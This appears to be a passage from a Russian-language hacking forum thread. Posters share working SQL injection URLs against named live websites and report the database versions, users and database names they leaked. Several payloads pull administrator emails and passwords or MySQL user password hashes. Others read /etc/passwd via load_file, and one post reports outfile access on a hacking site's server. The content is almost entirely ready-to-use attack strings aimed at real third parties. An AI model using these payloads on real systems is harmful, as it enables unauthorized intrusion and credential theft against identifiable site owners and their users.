Adt.com.tw pr5 Bureau Veritas ADT *щито? Code: [COLOR=SlateGray]http://www.adt.com.tw/indexNewsData.phtml?NEWSID=1'+and+substring(version(),1,1)=3+--+[/COLOR] version: 3.23.58 user: user1@localhost database: my_news
Code: http://medzdirect.com/productdetail.php?id=-1+UNION+ALL+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12-- Code: http://medzdirect.com/productdetail.php?id=-1+UNION+ALL+SELECT+1,concat(table_name),3,4,5,6,7,8,9,10,11,12+FROM+information_schema.tables+LIMIT+22,1-- Code: http://medzdirect.com/productdetail.php?id=-1+UNION+ALL+SELECT+1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12+from+information_Schema.columns+where+table_name=0x68616c5f61646d696e6973747261746f7273-- Code: http://medzdirect.com/productdetail.php?id=-1+UNION+ALL+SELECT+1,group_concat(emailid,0x3a,UserID,0x3a,Password),3,4,5,6,7,8,9,10,11,12+from+hal_administrators
Database Version: 4.1.25-log Database name: wwwlena_ivanovaru_tabacum User name: lenaivan@localhost Футбольная Трансферная Биржа Database Version: 4.1.22-log Database name: legion21 User name: u_legion21@localhost Украинский Опель Клуб Database Version: 5.0.51a-log Database name: opelclub_phpmydirectory User name: opelclub_cards@localhost ТВ,Интернет Магазин "Як Барбі" Database Version: 4.0.27-standard-log Database name: I-shop User name: i-shop@localhost
Это в "Ваши вопросы по уязвимостям" User:[email protected] Database:tastselvweb_dk_db Version:5.0.27-standard
5.0.44-log:MySQLr00t@localhost http://nasrcityco.com/ar/newsdetails.php?id=-100+union+select+concat_ws(0x3a,version(),user()),2,concat_ws(0x3a,host,user,password,file_priv),4+from+mysql.user http://nasrcityco.com/ar/newsdetails.php?id=-100+union+select+load_file(0x2F6574632F706173737764),2,3,4
www.louvores.net Code: http://www.louvores.net/home.php?genres_parent=11+union+all+select+concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,2,3,4,5,6-- user:louvores_root@localhost vers:5.0.81-community base:louvores_opial www.freerfmusic.com Code: http://freerfmusic.com/home.php?genres_parent=12+union+all+select+concat_ws%280x3a,version%28%29,database%28%29,user%28%29,2,3,4,5,6,7-- user:freerfmu_llk@localhost vers:5.0.81-community base:freerfmu_mdb
sportsbl@localhost:bolang:5.0.51b-enterprise-gpl Code: http://www.sportsbl.com/hot/mp3.php?ID=-10420+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7-- hutorby_mp3@localhost:hutorby_mp3hits:4.1.22-standard Code: http://mp3hits.hutor.by/radionext-mp3.php?id=-6+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6--
User: [email protected] Database: db109396152 Version: 4.0.27-max-log Чуть раньше постил о SQL на CMC.dk, вот ещё нашёл в одном месте. [email protected]:cmcdk2:4.0.24-log
Code: http://[COLOR=Green]marina-look.com[/COLOR]/showimg.php?id=-123+union+select+1,concat_ws(char(58),user(),database(),version()),3,4-- MARINALOOK_DB01@LOCALHOST:MARINALOOK_DB01:4.1.22-STANDARD pr:3
User: [email protected] Database: mandala Version: 4.1.20-standard-extsql-log User: [email protected] Database: colincoinstitute_dk_db Version: 5.0.67-log
PR = 5 _http://sdsb.lums.edu.pk/pages/sdsb_faculty_detail.php?id=-3+union+select+1,2,3,4,5,version(),7,8,9,10,11,12-- 4.0.20 7
http://www.chu-cme.org/backoffice/newsletter/preview.php?id=15+UNION+SELECT+1,user(),3,4,5,6,7,8 Database Version: 5.0.67 Database name: chucme User name: chucme@localhost
www.hackzone.ru ================== 5.0.27-log : root@ : localhost : root : : Y http://www.manuals.ws/files/list.php?cat=-1+union+select++1,2,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),4,5+from+mysql.user-- http://www.manuals.ws/files/list.php?cat=-1+union+select+1,2,load_file(0x2f6574632f706173737764),4,5-- В конфигах Апача пути до: ServerName cracks.hackzone.ru ServerName mbloc.hackzone.ru ServerName nod32.hackzone.ru ServerName www.hackzone.ru ServerName thecracks.us ServerName www.crackspider.de ServerName needcrack.us ServerName cracks.thebugs.us ServerName serials.thebugs.us ServerName www.crackway.com ServerName www.crackportal.com ServerName bestcracks.net и др. работает outfile. Посмотрел на Хакзону изнутри, полезно. Просьба, не вредить проекту.
Code: http://www.jordan-home.net/current-news.php?news=-31+union+select+1,2,concat_ws(char(58),user(),database(),version()),4,5-- [email protected]:alla5sam_site:4.0.27-max-log Уязвимы все сайты от 21web.ru с mysql
User: root@localhost Database: dbpetfoods Version: 5.0.27 Version: 5.0.27 На user() и database() отвечает ошибкой.
http://www.alecto.dk/sider/index.php4?traeid=-481+union+select+hex(user()) http://www.alecto.dk/sider/index.php4?traeid=-481+union+select+hex(database()) root@localhost : dbalecto --------------------- 5.0.51a-3ubuntu5.1 : [email protected] : localhost : root : Y http://www.combatlifestyle.com/mov/view_movie.php?id=-1+union+select+1,2,3,concat_ws(0x203a20,version(),user(),host,user,password,file_priv),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user-- http://www.combatlifestyle.com/mov/view_movie.php?id=-1+union+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7,8,9,10,11,12,13,14,15,16,17,18--
